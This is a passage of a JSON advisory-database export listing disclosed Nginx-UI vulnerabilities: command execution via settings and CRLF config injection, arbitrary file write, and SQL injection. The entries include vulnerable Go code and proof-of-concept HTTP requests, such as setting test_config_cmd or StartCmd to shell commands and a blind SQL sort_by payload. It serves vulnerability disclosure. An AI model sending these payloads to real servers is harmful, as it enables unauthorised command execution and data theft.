[NIST: Key Management Guidelines](https://csrc.nist.gov/publications/detail/sp/800-57-part-1/rev-5/final)","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-03-05T18:26:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762","https://csrc.nist.gov/publications/detail/sp/800-57-part-1/rev-5/final","https://owasp.org/www-project-top-ten/2017/A2_2017-Broken_Authentication","https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure","https://nvd.nist.gov/vuln/detail/CVE-2026-27944","https://github.com/advisories/GHSA-g9w5-qffc-6762"],"source_kind":"github","identifiers":["GHSA-g9w5-qffc-6762","CVE-2026-27944"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-05T19:00:08.054Z","updated_at":"2026-09-25T12:05:34.316Z","epss_percentage":0.01014,"epss_percentile":0.61682,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nOXc1LXFmZmMtNjc2Ms4ABTO8","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nOXc1LXFmZmMtNjc2Ms4ABTO8","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":"2.3.3","vulnerable_version_range":"\u003c 2.3.3"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nOXc1LXFmZmMtNjc2Ms4ABTO8/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xY2pxLTdmN3YtcHZjOM4AA47s","url":"https://github.com/advisories/GHSA-qcjq-7f7v-pvc8","title":"Nginx-UI vulnerable to authenticated RCE through injecting into the application config via CRLF","description":"### Summary\n\nFix bypass to the following bugs\n\n- https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-pxmr-q2x3-9x9m\n- https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-8r25-68wm-jw35\n\nAllowing to inject directly in the `app.ini` via CRLF to change the value of `test_config_cmd` and `start_cmd` resulting in an Authenticated RCE\n\n### Impact\nAuthenticated Remote execution on the host","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-01-29T22:30:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-qcjq-7f7v-pvc8","https://nvd.nist.gov/vuln/detail/CVE-2024-23828","https://github.com/0xJacky/nginx-ui/commit/d70e37c8575e25b3da7203ff06da5e16c77a42d1","https://pkg.go.dev/vuln/GO-2024-2480","https://github.com/advisories/GHSA-qcjq-7f7v-pvc8"],"source_kind":"github","identifiers":["GHSA-qcjq-7f7v-pvc8","CVE-2024-23828"],"repository_url":"https://github.com/0xJacky/nginx-ui","blast_radius":1.0,"created_at":"2024-01-29T23:04:51.064Z","updated_at":"2026-09-23T10:01:41.050Z","epss_percentage":0.01054,"epss_percentile":0.6293,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xY2pxLTdmN3YtcHZjOM4AA47s","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xY2pxLTdmN3YtcHZjOM4AA47s","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":"1.9.10-0.20240126104956-d70e37c8575e","vulnerable_version_range":"\u003c 1.9.10-0.20240126104956-d70e37c8575e"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xY2pxLTdmN3YtcHZjOM4AA47s/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14dnE5LTR2cHYtMjI3bc4AA47r","url":"https://github.com/advisories/GHSA-xvq9-4vpv-227m","title":"Nginx-UI vulnerable to arbitrary file write through the Import Certificate feature","description":"### Summary\n\nThe Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.\n\nhttps://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72\n\n```go\nfunc AddCert(c *gin.Context) {\n\tvar json struct {\n\t\tName                  string `json:\"name\"`\n\t\tSSLCertificatePath    string `json:\"ssl_certificate_path\" binding:\"required\"`\n\t\tSSLCertificateKeyPath string `json:\"ssl_certificate_key_path\" binding:\"required\"`\n\t\tSSLCertificate        string `json:\"ssl_certificate\"`\n\t\tSSLCertificateKey     string `json:\"ssl_certificate_key\"`\n\t\tChallengeMethod       string `json:\"challenge_method\"`\n\t\tDnsCredentialID       int    `json:\"dns_credential_id\"`\n\t}\n\tif !api.BindAndValid(c, \u0026json) {\n\t\treturn\n\t}\n\tcertModel := \u0026model.Cert{\n\t\tName:                  json.Name,\n\t\tSSLCertificatePath:    json.SSLCertificatePath,\n\t\tSSLCertificateKeyPath: json.SSLCertificateKeyPath,\n\t\tChallengeMethod:       json.ChallengeMethod,\n\t\tDnsCredentialID:       json.DnsCredentialID,\n\t}\n\n\terr := certModel.Insert()\n\n\tif err != nil {\n\t\tapi.ErrHandler(c, err)\n\t\treturn\n\t}\n\n\tcontent := \u0026cert.Content{\n\t\tSSLCertificatePath:    json.SSLCertificatePath,\n\t\tSSLCertificateKeyPath: json.SSLCertificateKeyPath,\n\t\tSSLCertificate:        json.SSLCertificate,\n\t\tSSLCertificateKey:     json.SSLCertificateKey,\n\t}\n\n\terr = content.WriteFile()\n\n\tif err != nil {\n\t\tapi.ErrHandler(c, err)\n\t\treturn\n\t}\n\n\tc.JSON(http.StatusOK, Transformer(certModel))\n}\n\n```\nhttps://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15\n\n```go\nfunc (c *Content) WriteFile() (err error) {\n\t// MkdirAll creates a directory named path, along with any necessary parents,\n\t// and returns nil, or else returns an error.\n\t// The permission bits perm (before umask) are used for all directories that MkdirAll creates.\n\t// If path is already a directory, MkdirAll does nothing and returns nil.\n\n\terr = os.MkdirAll(filepath.Dir(c.SSLCertificatePath), 0644)\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = os.MkdirAll(filepath.Dir(c.SSLCertificateKeyPath), 0644)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif c.SSLCertificate != \"\" {\n\t\terr = os.WriteFile(c.SSLCertificatePath, []byte(c.SSLCertificate), 0644)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\tif c.SSLCertificateKey != \"\" {\n\t\terr = os.WriteFile(c.SSLCertificateKeyPath, []byte(c.SSLCertificateKey), 0644)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\treturn\n}\n```\n\n\n### PoC\n\n```\nPOST /api/cert HTTP/1.1\nHost: 127.0.0.1:9000\nContent-Length: 144\nAccept: application/json, text/plain, */*\nAuthorization: \u003cJWT\u003e\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7\nConnection: close\n\n{\"name\":\"poc\",\"ssl_certificate_path\":\"/tmp/test\",\"ssl_certificate_key_path\":\"/tmp/test2\",\"ssl_certificate\":\"test\",\"ssl_certificate_key\":\"test2\"}\n```\n\n```bash\nroot@aze:~/nginx# ls -la /tmp/test*\n-rw-r--r-- 1 root root 4 Jan 24 13:33 /tmp/test\n-rw-r--r-- 1 root root 5 Jan 24 13:33 /tmp/test2\n```\n\nIt's possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.\n\n```bash\nroot@aze:~/nginx# cat app.ini  | grep \"StartCmd\"\nStartCmd          = login\n```\nThen we overwrite the `StartCmd` with `bash`\n\n```\nPOST /api/cert HTTP/1.1\nHost: 127.0.0.1:9000\nContent-Length: 980\nAccept: application/json, text/plain, */*\nAuthorization: \u003cJWT\u003e\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7\nConnection: close\n\n{\"name\":\"poc\",\"ssl_certificate_path\":\"/root/nginx/app.ini\",\"ssl_certificate_key_path\":\"/tmp/test2\",\"ssl_certificate\":\"[server]\\r\\nHttpHost          = 0.0.0.0\\r\\nHttpPort          = 9000\\r\\nRunMode           = debug\\r\\nJwtSecret         = 504f334b-ac68-4fbc-9160-2ecbf9e5794c\\r\\nNodeSecret        = 139ab224-9e9e-444f-987e-b3a651175ad5\\r\\nHTTPChallengePort = 9180\\r\\nEmail             = props@pros.com\\r\\nDatabase          = database\\r\\nStartCmd          = bash\\r\\nCADir             = dqsdqsd\\r\\nDemo              = false\\r\\nPageSize          = 10\\r\\nGithubProxy       = dqsdqfsdfsdfsdfsd\\r\\n\\r\\n[nginx]\\r\\nAccessLogPath =\\r\\nErrorLogPath  =\\r\\nConfigDir     =\\r\\nPIDPath       =\\r\\nTestConfigCmd =\\r\\nReloadCmd     =\\r\\nRestartCmd    =\\r\\n\\r\\n[openai]\\r\\nBaseUrl = \\r\\nToken   =\\r\\nProxy   =\\r\\nModel   = \\r\\n\\r\\n[casdoor]\\r\\nEndpoint     =\\r\\nClientId     =\\r\\nClientSecret =\\r\\nCertificate  =\\r\\nOrganization =\\r\\nApplication  =\\r\\nRedirectUri  =\",\"ssl_certificate_key\":\"test2\"}\n```\n\n```bash\nroot@aze:~/nginx# cat app.ini  | grep \"StartCmd\"\nStartCmd          = bash\n```\n\nFor the new config to be applied the app needs to be restarted\n\n![image](https://user-images.githubusercontent.com/26652608/299331664-6415a8c1-6611-4e53-8137-3e574c58da28.png)\n\n\n\n### Impact\n\nArbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2024-01-29T22:30:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m","https://nvd.nist.gov/vuln/detail/CVE-2024-23827","https://github.com/0xJacky/nginx-ui/commit/8581bdd3c6f49ab345b773517ba9173fa7fc6199","https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72","https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15","https://github.com/advisories/GHSA-xvq9-4vpv-227m"],"source_kind":"github","identifiers":["GHSA-xvq9-4vpv-227m","CVE-2024-23827"],"repository_url":"https://github.com/0xJacky/nginx-ui","blast_radius":1.0,"created_at":"2024-01-29T23:04:51.090Z","updated_at":"2026-10-03T14:01:46.145Z","epss_percentage":0.00705,"epss_percentile":0.51677,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14dnE5LTR2cHYtMjI3bc4AA47r","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14dnE5LTR2cHYtMjI3bc4AA47r","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":"1.9.10-0.20240128060047-8581bdd3c6f4","vulnerable_version_range":"\u003c 1.9.10-0.20240128060047-8581bdd3c6f4"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14dnE5LTR2cHYtMjI3bc4AA47r/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04cjI1LTY4d20tanczNc4AA4Y5","url":"https://github.com/advisories/GHSA-8r25-68wm-jw35","title":"Authenticated (user role) arbitrary command execution by modifying `start_cmd` setting (GHSL-2023-268)","description":"### Summary\nNginx-UI is a web interface to manage Nginx configurations. It is vulnerable to arbitrary command execution by abusing the configuration settings.\n\n### Details\nThe `Home \u003e Preference` page exposes a list of system settings such as `Run Mode`, `Jwt Secret`, `Node Secret` and `Terminal Start Command`. The latter is used to specify the command to be executed when a user opens a terminal from the web interface. While the UI doesn't allow users to modify the `Terminal Start Command` setting, it is possible to do so by sending a request to the [API](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/router.go#L13).\n\n```go\nfunc InitPrivateRouter(r *gin.RouterGroup) {\n    r.GET(\"settings\", GetSettings)\n    r.POST(\"settings\", SaveSettings)\n    ...\n}\n```\n\nThe [`SaveSettings`](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/settings.go#L18) function is used to save the settings. It is protected by the [`authRequired`](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/router/middleware.go#L45) middleware, which requires a valid JWT token or a `X-Node-Secret` which must equal the `Node Secret` configuration value. However, given the lack of authorization roles, any authenticated user can modify the settings.\n\nThe `SaveSettings` function is defined as follows:\n\n```go\nfunc SaveSettings(c *gin.Context) {\n    var json struct {\n        Server settings.Server `json:\"server\"`\n        ...\n    }\n\n    ...\n\n    settings.ServerSettings = json.Server\n\n    ...\n\n    err := settings.Save()\n    ...\n}\n```\n\nThe `Terminal Start Command` setting is stored as [`settings.ServerSettings.StartCmd`](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/settings/server.go#L12). By spawning a terminal with [`Pty`](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/terminal/pty.go#L11), the `StartCmd` setting is used:\n\n```go\nfunc Pty(c *gin.Context) {\n\t...\n\n\tp, err := pty.NewPipeLine(ws)\n\n\t...\n}\n```\n\nThe [`NewPipeLine`](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/internal/pty/pipeline.go#L29) function is defined as follows:\n\n```go\nfunc NewPipeLine(conn *websocket.Conn) (p *Pipeline, err error) {\n\tc := exec.Command(settings.ServerSettings.StartCmd)\n\n    ...\n```\nThis issue was found using CodeQL for Go: [Command built from user-controlled sources](https://codeql.github.com/codeql-query-help/go/go-command-injection/).\n\n#### Proof of Concept\n\u003e Based on [this setup](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/README.md?plain=1#L210) using `uozi/nginx-ui:v2.0.0-beta.7`.\n1. Login as a newly created user.\n2. Send the following request to modify the settings with `\"start_cmd\":\"bash\"` :\n```http\nPOST /api/settings HTTP/1.1\nHost: 127.0.0.1:8080\nContent-Length: 512\nAuthorization: \u003c\u003cJWT TOKEN\u003e\u003e\nContent-Type: application/json\n\n{\"nginx\":{\"access_log_path\":\"\",\"error_log_path\":\"\",\"config_dir\":\"\",\"pid_path\":\"\",\"test_config_cmd\":\"\",\"reload_cmd\":\"\",\"restart_cmd\":\"\"},\"openai\":{\"base_url\":\"\",\"token\":\"\",\"proxy\":\"\",\"model\":\"\"},\"server\":{\"http_host\":\"0.0.0.0\",\"http_port\":\"9000\",\"run_mode\":\"debug\",\"jwt_secret\":\"...\",\"node_secret\":\"...\",\"http_challenge_port\":\"9180\",\"email\":\"...\",\"database\":\"foo\",\"start_cmd\":\"bash\",\"ca_dir\":\"\",\"demo\":false,\"page_size\":10,\"github_proxy\":\"\"}}\n```\n3. Open a terminal from the web interface and execute arbitrary commands as `root`:\n```\nroot@1de46642d108:/app# id\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n### Impact\nThis issue may lead to authenticated Remote Code Execution, Privilege Escalation, and Information Disclosure.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-01-11T16:32:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-8r25-68wm-jw35","https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3","https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/settings.go#L18","https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/terminal/pty.go#L11","https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/internal/pty/pipeline.go#L29","https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/router/middleware.go#L45","https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/settings/server.go#L12","https://nvd.nist.gov/vuln/detail/CVE-2024-22198","https://pkg.go.dev/vuln/GO-2024-2462","https://github.com/advisories/GHSA-8r25-68wm-jw35"],"source_kind":"github","identifiers":["GHSA-8r25-68wm-jw35","CVE-2024-22198"],"repository_url":"https://github.com/0xJacky/nginx-ui","blast_radius":1.0,"created_at":"2024-01-11T17:10:43.991Z","updated_at":"2026-08-29T17:01:03.780Z","epss_percentage":0.04055,"epss_percentile":0.89946,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04cjI1LTY4d20tanczNc4AA4Y5","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04cjI1LTY4d20tanczNc4AA4Y5","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":"1.9.10-0.20231219184941-827e76c46e63","vulnerable_version_range":"\u003c 1.9.10-0.20231219184941-827e76c46e63"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04cjI1LTY4d20tanczNc4AA4Y5/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1weG1yLXEyeDMtOXg5bc4AA4Y4","url":"https://github.com/advisories/GHSA-pxmr-q2x3-9x9m","title":"Authenticated (user role) remote command execution by modifying `nginx` settings (GHSL-2023-269)","description":"### Summary\nThe `Home \u003e Preference` page exposes a small list of nginx settings such as `Nginx Access Log Path` and `Nginx Error Log Path`. However, the API also exposes `test_config_cmd`, `reload_cmd` and `restart_cmd`. While the UI doesn't allow users to modify any of these settings, it is possible to do so by sending a request to the [API](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/router.go#L13).\n```go\nfunc InitPrivateRouter(r *gin.RouterGroup) {\n    r.GET(\"settings\", GetSettings)\n    r.POST(\"settings\", SaveSettings)\n    ...\n}\n```\nThe [`SaveSettings`](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/settings.go#L18) function is used to save the settings. It is protected by the [`authRequired`](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/router/middleware.go#L45) middleware, which requires a valid JWT token or a `X-Node-Secret` which must equal the `Node Secret` configuration value. However, given the lack of authorization roles, any authenticated user can modify the settings.\nThe `SaveSettings` function is defined as follows:\n```go\nfunc SaveSettings(c *gin.Context) {\n    var json struct {\n        ...\n        Nginx  settings.Nginx  `json:\"nginx\"`\n        ...\n    }\n\n    ...\n\n    settings.NginxSettings = json.Nginx\n\n    ...\n\n    err := settings.Save()\n    ...\n}\n```\nThe `test_config_cmd` setting is stored as [`settings.NginxSettings.TestConfigCmd`](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/settings/nginx.go#L8). When the application wants to test the nginx configuration, it uses the [`TestConf`](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/internal/nginx/nginx.go#L26) function:\n```go\nfunc TestConf() (out string) {\n\tif settings.NginxSettings.TestConfigCmd != \"\" {\n\t\tout = execShell(settings.NginxSettings.TestConfigCmd)\n\n\t\treturn\n\t}\n\n\tout = execCommand(\"nginx\", \"-t\")\n\n\treturn\n}\n```\nThe [`execShell`](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/internal/nginx/nginx.go#L8) function is defined as follows:\n```go\nfunc execShell(cmd string) (out string) {\n\tbytes, err := exec.Command(\"/bin/sh\", \"-c\", cmd).CombinedOutput()\n\tout = string(bytes)\n\tif err != nil {\n\t\tout += \" \" + err.Error()\n\t}\n\treturn\n}\n```\nWhere the `cmd` argument is user-controlled and is passed to `/bin/sh -c`.\nThis issue was found using CodeQL for Go: [Command built from user-controlled sources](https://codeql.github.com/codeql-query-help/go/go-command-injection/).\n\n#### Proof of Concept\n\u003e Based on [this setup](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/README.md?plain=1#L210) using `uozi/nginx-ui:v2.0.0-beta.7`.\n1. Login as a newly created user.\n2. Send the following request to modify the settings with `\"test_config_cmd\":\"touch /tmp/pwned\"`.\n```http\nPOST /api/settings HTTP/1.1\nHost: 127.0.0.1:8080\nContent-Length: 528\nAuthorization: \u003c\u003cJWT TOKEN\u003e\nContent-Type: application/json\n\n{\"nginx\":{\"access_log_path\":\"\",\"error_log_path\":\"\",\"config_dir\":\"\",\"pid_path\":\"\",\"test_config_cmd\":\"touch /tmp/pwned\",\"reload_cmd\":\"\",\"restart_cmd\":\"\"},\"openai\":{\"base_url\":\"\",\"token\":\"\",\"proxy\":\"\",\"model\":\"\"},\"server\":{\"http_host\":\"0.0.0.0\",\"http_port\":\"9000\",\"run_mode\":\"debug\",\"jwt_secret\":\"foo\",\"node_secret\":\"foo\",\"http_challenge_port\":\"9180\",\"email\":\"foo\",\"database\":\"foo\",\"start_cmd\":\"\",\"ca_dir\":\"\",\"demo\":false,\"page_size\":10,\"github_proxy\":\"\"}}\n```\n3. Add a new site in `Home \u003e Manage Sites \u003e Add Site` with random data. The previously-modified `test_config_cmd` setting will be used [when the application tries to test the nginx configuration](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/sites/domain.go#L256).\n4. Verify that `/tmp/pwned` exists.\n```\n$ docker exec -it $(docker ps -q) ls -al /tmp\n-rw-r--r-- 1 root root    0 Dec 14 21:10 pwned\n```\n\n### Impact\n\nThis issue may lead to authenticated Remote Code Execution, Privilege Escalation, and Information Disclosure.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-01-11T16:30:29.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-pxmr-q2x3-9x9m","https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3","https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/router.go#L13","https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/settings.go#L18","https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/router/middleware.go#L45","https://nvd.nist.gov/vuln/detail/CVE-2024-22197","https://pkg.go.dev/vuln/GO-2024-2464","https://github.com/advisories/GHSA-pxmr-q2x3-9x9m"],"source_kind":"github","identifiers":["GHSA-pxmr-q2x3-9x9m","CVE-2024-22197"],"repository_url":"https://github.com/0xJacky/nginx-ui","blast_radius":1.0,"created_at":"2024-01-11T17:10:44.056Z","updated_at":"2026-09-23T10:01:41.051Z","epss_percentage":0.01537,"epss_percentile":0.73742,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1weG1yLXEyeDMtOXg5bc4AA4Y4","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1weG1yLXEyeDMtOXg5bc4AA4Y4","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":"1.9.10-0.20231219184941-827e76c46e63","vulnerable_version_range":"\u003c 1.9.10-0.20231219184941-827e76c46e63"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1weG1yLXEyeDMtOXg5bc4AA4Y4/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oMzc0LW1tNTctODc5Y84AA4Y3","url":"https://github.com/advisories/GHSA-h374-mm57-879c","title":"Authenticated (user role) SQL injection in `OrderAndPaginate` (GHSL-2023-270)","description":"### Summary\nThe [`OrderAndPaginate`](https://github.com/0xjacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/model/model.go#L99C4) function is used to order and paginate data. It is defined as follows:\n```go\nfunc OrderAndPaginate(c *gin.Context) func(db *gorm.DB) *gorm.DB {\n\treturn func(db *gorm.DB) *gorm.DB {\n\t\tsort := c.DefaultQuery(\"order\", \"desc\")\n\n\t\torder := fmt.Sprintf(\"`%s` %s\", DefaultQuery(c, \"sort_by\", \"id\"), sort)\n\t\tdb = db.Order(order)\n\n\t\t...\n\t}\n}\n```\nBy using [`DefaultQuery`](https://github.com/0xjacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/model/model.go#L278-L287), the `\"desc\"` and `\"id\"` values are used as default values if the query parameters are not set. Thus, the `order` and `sort_by` query parameter are user-controlled and are being appended to the `order` variable without any sanitization.\nThe same happens with [`SortOrder`](https://github.com/0xjacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/model/model.go#L91), but it doesn't seem to be used anywhere.\n```go\nfunc SortOrder(c *gin.Context) func(db *gorm.DB) *gorm.DB {\n\treturn func(db *gorm.DB) *gorm.DB {\n\t\tsort := c.DefaultQuery(\"order\", \"desc\")\n\t\torder := fmt.Sprintf(\"`%s` %s\", DefaultQuery(c, \"sort_by\", \"id\"), sort)\n\t\treturn db.Order(order)\n\t}\n}\n```\nThis issue was found using CodeQL for Go: [Database query built from user-controlled sources](https://codeql.github.com/codeql-query-help/go/go-sql-injection/).\n\n#### Proof of Concept\n\u003e Based on [this setup](https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/README.md?plain=1#L210) using `uozi/nginx-ui:v2.0.0-beta.7`.\nIn order to exploit this issue, we need to find a place where the `OrderAndPaginate` function is used. We can find it in the `GET /api/dns_credentials` endpoint.\n```go\nfunc GetDnsCredentialList(c *gin.Context) {\n\tcosy.Core[model.DnsCredential](c).SetFussy(\"provider\").PagingList()\n}\n```\nThe `PagingList` function is defined as follows:\n```go\nfunc (c *Ctx[T]) PagingList() {\n\tdata, ok := c.PagingListData()\n\tif ok {\n\t\tc.ctx.JSON(http.StatusOK, data)\n\t}\n}\n```\nAnd the `PagingListData` function is defined as follows:\n```go\nfunc (c *Ctx[T]) PagingListData() (*model.DataList, bool) {\n\tresult, ok := c.result()\n\tif !ok {\n\t\treturn nil, false\n\t}\n\n\tresult = result.Scopes(c.OrderAndPaginate())\n\t...\n}\n```\nUsing the following request, an attacker can retrieve arbitrary values by checking the order used by the query. That is, the result of the comparison will make the response to be ordered in a specific way.\n```http\nGET /api/dns_credentials?sort_by=(CASE+WHEN+(SELECT+1)=1+THEN+id+ELSE+updated_at+END)+ASC+--+ HTTP/1.1\nHost: 127.0.0.1:8080\nAuthorization: \u003c\u003cJWT TOKEN\u003e\n```\nYou can notice the order change by changing `=1` to `=2`, and so the comparison will return `false` and the order will be `updated_at` instead of `id`.\n\n### Impact\nThis issue may lead to `Information Disclosure`","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-01-11T16:27:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.0,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h374-mm57-879c","https://github.com/0xJacky/nginx-ui/commit/ec93ab05a3ecbb6bcf464d9dca48d74452df8a5b","https://github.com/0xjacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/model/model.go#L278-L287","https://github.com/0xjacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/model/model.go#L91","https://github.com/0xjacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/model/model.go#L99C4","https://nvd.nist.gov/vuln/detail/CVE-2024-22196","https://github.com/advisories/GHSA-h374-mm57-879c"],"source_kind":"github","identifiers":["GHSA-h374-mm57-879c","CVE-2024-22196"],"repository_url":"https://github.com/0xJacky/nginx-ui","blast_radius":1.0,"created_at":"2024-01-11T17:10:44.137Z","updated_at":"2026-09-25T